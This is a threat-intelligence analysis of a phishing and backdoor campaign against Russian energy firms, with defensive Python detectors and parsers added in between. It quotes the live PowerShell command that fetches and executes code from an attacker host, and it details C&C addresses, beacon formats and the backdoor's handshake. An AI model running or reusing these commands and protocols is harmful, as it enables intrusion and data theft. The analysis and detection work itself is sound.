Investigating spy activity targeting Russia's fuel and energy sector


Our experience in investigating computer security incidents shows that e-mail remains one of the favourite ways for attackers to get into the networks they target. A single careless action with a suspicious (or not so suspicious) message becomes the entry point for an infection, which is why cybercriminals keep relying on social engineering, with varying degrees of success.

In this post we discuss our recent investigation of a spam campaign aimed at several companies in Russia's fuel and energy sector. All of the attacks followed the same scenario using fake e-mails, and nobody seems to have put much effort into the text of those e-mails.

Reconnaissance

It all began at the end of April 2020, when Doctor Web virus analysts discovered a spam campaign in which the attackers sent an updated telephone directory to employees of several Russian fuel and energy companies. Of course, this was not a simple act of courtesy: the directory was not genuine, and the .docx documents downloaded two images from remote resources.

One of them was downloaded to the user's computer from the news[.]zannews[.]com server. It is notable that the domain name resembles the domain of the anti-corruption media centre of Kazakhstan, zannews[.]kz. On the other hand, the domain that was used also recalled another campaign from 2015 known as TOPNEWS, which used the ICEFOG backdoor and whose Trojan control domains contained the substring "news" in their names. Another interesting detail was that when the e-mails were sent to different recipients, the requests to download the image used either different request parameters or unique image names.

We believe this was done in order to collect information and identify a "reliable" recipient, one who is guaranteed to open the message at the right time. The SMB protocol was used to download the image from the second server, which could have been done to collect the NetNTLM hashes from the computers of the employees who opened the received document.
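A defender-side check that follows from this reconnaissance stage, as an added example and not code from the original post or from Doctor Web: it opens a .docx as the ZIP package it is and lists every relationship with TargetMode="External", classifying UNC and file://host targets separately because those make Word authenticate to the remote host over SMB, which is exactly the NetNTLM exposure described above. The sample package, host names and address in the block are constructed for the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def classify(target: str) -> str:
    """Name the transport a target would be fetched over: smb (UNC or file://host), http(s), or other."""
    if target.startswith("\\\\"):
        return "smb"
    parsed = urlparse(target)
    if parsed.scheme.lower() == "file" and parsed.netloc:
        return "smb"
    return parsed.scheme.lower() or "other"


def external_targets(docx_bytes: bytes) -> list:
    """List every relationship in an OOXML package that points outside the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        for name in package.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(package.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts (styles, fonts) are not fetched from anywhere
                target = rel.get("Target", "")
                found.append({
                    "part": name,
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "scheme": classify(target),
                })
    return found


def build_sample_docx() -> bytes:
    """Constructed minimal package for the example: one HTTP image, one UNC image, one internal part."""
    unc_target = "\\\\203.0.113.10\\share\\logo.png"  # constructed, documentation-range address
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s/image" Target="http://news.example.invalid/img/user-7f3a.png" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="%s/image" Target="%s" TargetMode="External"/>'
        '<Relationship Id="rId3" Type="%s/styles" Target="styles.xml"/>'
        '</Relationships>'
    ) % (RELS_NS, OFFICE_REL, OFFICE_REL, unc_target, OFFICE_REL)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", "<document/>")
        package.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in external_targets(build_sample_docx()):
        print(hit["scheme"].upper(), hit["type"], hit["target"], "in", hit["part"])
```

An image relationship fetched over HTTP at open time leaks the fact (and the per-recipient URL) that the document was opened; a UNC target turns the same open into an outbound SMB authentication. Running this over mail attachments at the gateway, or over documents quarantined by the endpoint, surfaces both without executing the document.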

And here is the e-mail with the fake directory:

[Screenshot from the original post: the e-mail with the fake directory attached]

In June this year, the attackers started using a new domain name, sports[.]manhajnews[.]com, to host the images. Analysis showed that manhajnews[.]com subdomains had been used for spam mailings since at least September 2019. One of the targets of that activity was a major Russian university.

Also, by June the organizers of the attack had come up with a new text for their e-mails: this time the document contained information about industrial development. The text of the e-mail showed that its author was either not a native Russian speaker or was deliberately trying to appear that way. Unfortunately, the ideas about industrial development, as always, turned out to be just a cover: the document again downloaded two images, while the server changed to download[.]inklingpaper[.]com.

The next innovation followed in July. In an attempt to keep antivirus programs from detecting the malicious documents, the attackers started using password-protected Microsoft Word documents. At the same time, the attackers decided to use a classic social-engineering technique: a reward notification.


The text of the message was again written in the same style, which raised additional suspicion among the recipients. The server from which the image was downloaded did not change either.

Note that in all cases, mailboxes registered on the mail[.]ru and yandex[.]ru domains were used to send the e-mails.

Attack

By early September 2020, it was time to act. Our virus analysts recorded a new wave of attacks, in which the attackers once again sent e-mails under the pretext of updating a telephone directory. This time, however, the attachment contained a malicious macro.

When the document was opened, the macro created two files:

  • a VBS script, %APPDATA%\microsoft\windows\start menu\programs\startup\adoba.vbs, whose task was to launch a batch file;
  • the batch file itself, %APPDATA%\configstest.bat, which was obfuscated.


The essence of its work comes down to launching a PowerShell shell with certain parameters. The parameters passed to the shell are converted into the following command:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

Judging by the given command, the domain from which the payload is downloaded is once again disguised as a news site. The payload is a simple loader whose only task is to receive shellcode from the command-and-control server and execute it. We were able to identify two types of backdoors that could be installed on the victim's PC.
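As an added example (my own code, not from the original post), here is detection logic a defender could run over process-creation and file-creation events: it looks for the combination seen in the command above, a COM object instantiated via GetTypeFromCLSID (the CLSID F5078F35-C551-11D3-89B9-0000F81FE221 is the MSXML XMLHTTP component, which is why Open/Send/responseText work on it), a GET to a remote URL, and IEX applied to the response, plus a check for VBS files dropped into the Startup folder as in the persistence step above. Apart from the command quoted in the post, the sample events are constructed.

```python
import re

# Indicators derived from the command the batch file assembles (quoted in the post); the regexes are my own.
INDICATORS = {
    # COM object created from a raw CLSID instead of a ProgId (keeps "MSXML2.XMLHTTP" out of the command line)
    "com_by_clsid": re.compile(r"\[activator\]::CreateInstance\(\s*\[type\]::GetTypeFromCLSID", re.I),
    # the specific CLSID used: MSXML XMLHTTP
    "xmlhttp_clsid": re.compile(r"F5078F35-C551-11D3-89B9-0000F81FE221", re.I),
    # a GET request built on that object
    "remote_get": re.compile(r"\.Open\(\s*['\"]GET['\"]", re.I),
    # the downloaded body handed straight to Invoke-Expression
    "iex_of_response": re.compile(r"\b(IEX|Invoke-Expression)\b[^;]*responseText", re.I),
}

# VBS dropped into the per-user Startup folder, as the macro above does with adoba.vbs
STARTUP_VBS = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.vbs$", re.I)


def indicators_hit(cmdline: str) -> list:
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_download_and_eval(cmdline: str) -> bool:
    """True when a fetched HTTP response is evaluated as code, however the fetch object was created."""
    hits = indicators_hit(cmdline)
    return "iex_of_response" in hits and ("remote_get" in hits or "com_by_clsid" in hits)


def is_startup_vbs(path: str) -> bool:
    return STARTUP_VBS.search(path) is not None


def triage(events: list) -> list:
    """Return (event, reasons) pairs for the events worth an analyst's look."""
    flagged = []
    for ev in events:
        reasons = []
        if ev.get("cmdline") and is_download_and_eval(ev["cmdline"]):
            reasons.append("PowerShell downloads and IEX-evaluates a remote body: "
                           + ", ".join(indicators_hit(ev["cmdline"])))
        if ev.get("path") and is_startup_vbs(ev["path"]):
            reasons.append("VBS written to the Startup folder")
        if reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed sample events; the first command line is the one quoted in the post.
SAMPLE_EVENTS = [
    {"kind": "proc", "image": "powershell.exe",
     "cmdline": '$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));'
                '$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;'},
    {"kind": "proc", "image": "powershell.exe", "cmdline": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"kind": "proc", "image": "powershell.exe",
     "cmdline": "Invoke-WebRequest https://updates.example.invalid/manifest.json -OutFile C:\\temp\\m.json"},
    {"kind": "file", "path": "C:\\Users\\u\\AppData\\Roaming\\microsoft\\windows\\start menu\\programs\\startup\\adoba.vbs"},
    {"kind": "file", "path": "C:\\Users\\u\\Documents\\notes.vbs"},
]


if __name__ == "__main__":
    for ev, why in triage(SAMPLE_EVENTS):
        print(ev.get("cmdline") or ev.get("path"), "->", "; ".join(why))
```

The third sample shows why the rule keys on IEX of the response rather than on "downloads something": a plain Invoke-WebRequest to a file is routine administration and produces no hit.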

BackDoor.Siggen2.3238

The first is BackDoor.Siggen2.3238; our specialists had not encountered it before, and there were no mentions of this program from other antivirus vendors either.

The program is a backdoor written in C++ and runs on 32-bit Windows operating systems.

BackDoor.Siggen2.3238 can communicate with the control server using two protocols: HTTP and HTTPS. The analysed sample uses HTTPS. The following User-Agent is used in requests to the server:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

In doing so, all requests carry the following set of parameters:

%s;type=%s;length=%s;realdata=%send

where each %s is correspondingly replaced by:

  • the ID of the infected computer,
  • the type of the request being sent,
  • the length of the data in the realdata field,
  • the data itself.

At the stage of collecting information about the infected system, the backdoor forms a string of the form:

lan=%s;cmpname=%s;username=%s;version=%s;

where lan is the IP address of the infected computer, cmpname is the computer name, username is the user name, and version is the string 0.0.4.03.

This message with the sysinfo identifier is sent in a POST request to the control server located at https[:]//31.214[.]157.14/log.txt. If in response BackDoor.Siggen2.3238 receives the HEART signal, the connection is considered successful and the backdoor starts its main cycle of communication with the server.
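The request layout and the sysinfo string above are enough to write a traffic check, so here is an added example (my own Python, not code from the post or from Doctor Web) that parses the %s;type=%s;length=%s;realdata=%send body, extracts the sysinfo fields, and lists the reasons an HTTP request looks like this backdoor's beacon. The sample body is constructed; that the length field counts the characters of realdata is my assumption.

```python
import re

# User-Agent and message layout as described for the analysed sample
USER_AGENT = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)"
BEACON_RX = re.compile(
    r"^(?P<bot_id>[^;]*);type=(?P<type>[^;]*);length=(?P<length>\d+);realdata=(?P<data>.*)end$",
    re.S,
)


def parse_beacon(body: str):
    """Split '%s;type=%s;length=%s;realdata=%send' into its parts, or return None."""
    m = BEACON_RX.match(body)
    if m is None:
        return None
    rec = m.groupdict()
    rec["length"] = int(rec["length"])
    # assumption: length counts the characters of realdata; a mismatch means either a different
    # build of the backdoor or data that itself ends in "end" and confused the greedy match
    rec["length_matches"] = rec["length"] == len(rec["data"])
    return rec


def parse_sysinfo(data: str) -> dict:
    """Parse 'lan=%s;cmpname=%s;username=%s;version=%s;' into a dict."""
    fields = {}
    for part in data.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key] = value
    return fields


def flag_request(user_agent: str, method: str, body: str) -> list:
    """Reasons an HTTP request looks like BackDoor.Siggen2.3238 traffic (empty list = nothing seen)."""
    reasons = []
    if user_agent == USER_AGENT:
        reasons.append("User-Agent equals the sample's hard-coded string")
    rec = parse_beacon(body)
    if rec is not None:
        reasons.append("body matches the beacon layout (bot id %s, type %s)" % (rec["bot_id"], rec["type"]))
        if method.upper() == "POST" and rec["type"] == "sysinfo":
            info = parse_sysinfo(rec["data"])
            if info.get("version") == "0.0.4.03":
                reasons.append("sysinfo reports version 0.0.4.03, the string seen in the sample")
    return reasons


# Constructed sysinfo beacon in the described layout (host name, user and address are made up)
SAMPLE_BODY = ("A1B2C3D4;type=sysinfo;length=58;"
               "realdata=lan=10.0.0.5;cmpname=WS01;username=alice;version=0.0.4.03;end")

if __name__ == "__main__":
    for reason in flag_request(USER_AGENT, "POST", SAMPLE_BODY):
        print("-", reason)
```

Because the sample talks HTTPS, the body check only applies where traffic is decrypted (a TLS-inspecting proxy or endpoint telemetry); the User-Agent check works on any HTTP traffic and on proxy logs, but on its own it is only a weak signal, since the string imitates a stock MSIE 9 agent.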

A full description of how BackDoor.Siggen2.3238 operates is available in our virus library.

BackDoor.Whitebird.23

The second program is a modification of the BackDoor.Whitebird backdoor, already known to us from the incident with a government agency in Kazakhstan. This version is written in C++ and is designed to run on both 32-bit and 64-bit Windows.

Like most programs of this type, BackDoor.Whitebird.23 is designed to establish an encrypted connection with the control server and to give unauthorized control over the infected computer. It is installed on the compromised system by the dropper BackDoor.Siggen2.3244.

The sample we analysed was a malicious library with two exported functions:

  • Google Play
  • Test.

At the start of its work, it decrypts the configuration embedded in the body of the backdoor using an algorithm based on XOR with the byte 0x99. The configuration looks like this:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

To ensure that it operates at the right times, the backdoor checks the value specified in the working_hours field of the configuration. This field contains 1440 bytes, each taking the value 0 or 1 and representing every minute of every hour of the day. It creates a separate thread for each network interface, which listens on that interface and looks for authentication packets sent from the infected computer to a proxy server. When such a packet is detected, the backdoor adds information about the proxy server to its list. In addition, it checks for the presence of a proxy via the InternetQueryOptionW WinAPI function.

The program checks the current minute and hour and compares them with the data in the working_hours configuration field. If the value for the corresponding minute of the day is non-zero, a connection to the control server is established.
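The st_cfg layout and the working_hours check above are what an analyst needs to pull a C&C address and a beaconing schedule out of a sample, so here is an added example (my own Python, not the malware's code or Doctor Web's) that XOR-decrypts a blob with 0x99, unpacks it with that layout, and evaluates the minute-of-day schedule. The configuration it parses is constructed in the block itself, and the hour*60+minute indexing of working_hours is my assumption; the post says only that the field holds one byte per minute of the day.

```python
import struct

XOR_KEY = 0x99

# st_cfg layout from the post; "<" means no implicit padding, which matches the struct because every
# DWORD field already sits on a 4-byte offset (total 2956 bytes).
CFG_FORMAT = "<I128s512sI200s200s1440s100sIII50s50s256s"
CFG_FIELDS = ["dword0", "campaign", "cnc_addr", "cnc_port", "cnc_addr2", "cnc_addr3",
              "working_hours", "proxy_domain", "proxy_port", "proxy_type", "use_proxy",
              "proxy_login", "proxy_password", "gapa8c"]
WCHAR_FIELDS = ("campaign", "cnc_addr", "cnc_addr2", "cnc_addr3", "proxy_domain")
BYTE_STRING_FIELDS = ("proxy_login", "proxy_password")
CFG_SIZE = struct.calcsize(CFG_FORMAT)


def xor_0x99(blob: bytes) -> bytes:
    """Single-byte XOR is its own inverse, so this both decrypts a sample and encrypts the test blob."""
    return bytes(b ^ XOR_KEY for b in blob)


def _wstr(raw: bytes) -> str:
    return raw.decode("utf-16-le", "replace").split("\x00", 1)[0]


def _bstr(raw: bytes) -> str:
    return raw.split(b"\x00", 1)[0].decode("ascii", "replace")


def parse_config(encrypted: bytes) -> dict:
    """Decrypt and unpack an st_cfg blob carved from a sample."""
    if len(encrypted) < CFG_SIZE:
        raise ValueError("blob shorter than st_cfg (%d bytes)" % CFG_SIZE)
    plain = xor_0x99(encrypted[:CFG_SIZE])
    cfg = dict(zip(CFG_FIELDS, struct.unpack(CFG_FORMAT, plain)))
    for name in WCHAR_FIELDS:
        cfg[name] = _wstr(cfg[name])
    for name in BYTE_STRING_FIELDS:
        cfg[name] = _bstr(cfg[name])
    return cfg


def is_active(working_hours: bytes, hour: int, minute: int) -> bool:
    """Schedule check. Assumption: byte index = minute of day (hour*60 + minute)."""
    return working_hours[hour * 60 + minute] != 0


def active_windows(working_hours: bytes) -> list:
    """Summarise the 1440-byte schedule as (start_minute, end_minute) ranges for a report."""
    windows, start = [], None
    for m in range(1441):
        on = m < 1440 and working_hours[m] != 0
        if on and start is None:
            start = m
        elif not on and start is not None:
            windows.append((start, m))
            start = None
    return windows


def build_sample_config(cnc="cnc.example.invalid", port=443, active=range(9 * 60, 18 * 60)) -> bytes:
    """Constructed, XOR-encrypted configuration used only to exercise the parser."""
    hours = bytearray(1440)
    for m in active:
        hours[m] = 1
    plain = struct.pack(CFG_FORMAT, 1, "campaign-test".encode("utf-16-le"), cnc.encode("utf-16-le"),
                        port, b"", b"", bytes(hours), b"", 0, 0, 0, b"", b"", b"")
    return xor_0x99(plain)


if __name__ == "__main__":
    cfg = parse_config(build_sample_config())
    print("C&C:", cfg["cnc_addr"], "port", cfg["cnc_port"], "campaign", cfg["campaign"])
    print("active windows (minute of day):", active_windows(cfg["working_hours"]))
    print("active at 10:30?", is_active(cfg["working_hours"], 10, 30))
```

A schedule restricted to office hours is worth noting in a report: beacons that only appear while staff are at their desks blend into normal traffic, so hunting for the C&C address should not be limited to off-hours connections.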

Establishing a connection with the server imitates the creation of a TLS 1.0 connection between client and server. The body of the backdoor contains two buffers.

The first buffer contains a TLS 1.0 Client Hello packet.


The second buffer contains TLS 1.0 Client Key Exchange packets with a key length of 0x100 bytes, Change Cipher Spec, and Encrypted Handshake Message.


When sending the Client Hello packet, the backdoor writes 4 bytes of the current time and 28 bytes of pseudo-random data into the Client Random field, calculated as follows:


v3 = time(0);                                        // current Unix time
// byte-swap v3 into big-endian (network) order: (v3 >> 8 >> 16) is simply v3 >> 24
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
// 28 "random" bytes = the swapped time plus DWORDs read from the cnc_addr config field
// (cnc_addr is wchar_t, so cnc_addr[i / 4] steps 2 bytes at a time and the reads overlap)
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
// finally each byte is XORed with 7 times its index
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

The resulting packet is sent to the control server. The response (the Server Hello packet) is checked for:

  • compliance with TLS protocol version 1.0;
  • a match between the timestamp (the first 4 bytes of the Random Data packet field) specified by the client and the timestamp specified by the server;
  • a match between the first 4 bytes following the timestamp in the Random Data field of the client and the server.

If the specified matches are present, the backdoor prepares a Client Key Exchange packet. To do so, it modifies the Public Key in the Client Key Exchange packet, as well as the Encryption IV and Encryption Data in the Encrypted Handshake Message packet.

The backdoor then receives a packet from the command-and-control server, checks that the TLS protocol version is 1.0, and then accepts another 54 bytes (the packet body). This completes the connection setup.
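The handshake imitation described above has a property a defender can use: a genuine TLS server draws its own Server Random, so a Server Hello whose first 8 random bytes equal the client's is itself a signal, and when the C&C address from the configuration is known, a captured Client Random can be checked against the generator. Here is an added example (my own Python re-implementation of the decompiled routine above and of the three Server Hello checks, not the backdoor's code or Doctor Web's). The timestamp and C&C host name used in the sample are constructed.

```python
import struct

TLS_1_0 = (3, 1)


def _swap32(value: int) -> int:
    """The decompiled (v3 >> 24) + ... expression: a 32-bit byte swap into network order."""
    return int.from_bytes((value & 0xFFFFFFFF).to_bytes(4, "big"), "little")


def build_client_random(now: int, cnc_addr: str) -> bytes:
    """Re-implementation of the routine above: 4-byte big-endian time + 28 derived bytes."""
    t = _swap32(now)
    # cnc_addr is a zero-padded wchar_t array in the config; the reads below need 16 bytes
    cnc = cnc_addr.encode("utf-16-le").ljust(32, b"\x00")
    rnd = bytearray(28)
    for i in range(0, 28, 4):
        # cnc_addr[i / 4] indexes wchar_t, so the 4-byte reads start at byte offsets 0,2,4,...,12
        # and overlap; this mirrors the decompiled code rather than being a transcription error
        word = struct.unpack_from("<I", cnc, (i // 4) * 2)[0]
        struct.pack_into("<I", rnd, i, (t + word) & 0xFFFFFFFF)
    for j in range(28):
        rnd[j] ^= (7 * j) & 0xFF
    return (now & 0xFFFFFFFF).to_bytes(4, "big") + bytes(rnd)


def random_matches_generator(client_random: bytes, cnc_addr: str) -> bool:
    """Does a captured 32-byte Client Random fit the generator for this C&C address?"""
    if len(client_random) != 32:
        return False
    ts = int.from_bytes(client_random[:4], "big")
    return build_client_random(ts, cnc_addr) == client_random


def server_hello_accepted(version: tuple, client_random: bytes, server_random: bytes) -> bool:
    """The three checks the backdoor applies to the Server Hello."""
    return (version == TLS_1_0
            and server_random[:4] == client_random[:4]
            and server_random[4:8] == client_random[4:8])


def server_echoes_client_random(client_random: bytes, server_random: bytes) -> bool:
    """Detection angle: a real TLS server never echoes the client's random, so an 8-byte match is a signal."""
    return server_random[:8] == client_random[:8]


if __name__ == "__main__":
    cr = build_client_random(1600000000, "cnc.example.invalid")  # constructed time and host
    print(cr.hex())
    print("fits generator:", random_matches_generator(cr, "cnc.example.invalid"))
```

Note that the first 4 bytes being the current time is legitimate TLS 1.0 behaviour (gmt_unix_time), so that alone is not suspicious; the echoed prefix in the Server Hello and the derivability of the remaining 28 bytes from the C&C address are what separate this handshake from a real one.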

A full description of how BackDoor.Whitebird.23 operates is available in our virus library.

Conclusions

Analysis of the documents, the malware and the infrastructure used allows us to state with confidence that the attack was prepared by one of the Chinese APT groups. Given the functionality of the backdoors installed on victims' computers in the event of a successful attack, an infection leads, at a minimum, to the theft of confidential information from the computers of the attacked organizations.

In addition, a very likely scenario is the installation of specialized Trojans on local servers that have a special function. These could be domain controllers, mail servers, Internet gateways, and so on. As we saw in the example of the incident in Kazakhstan, such servers are of particular interest to attackers for various reasons.

Source: www.habr.com
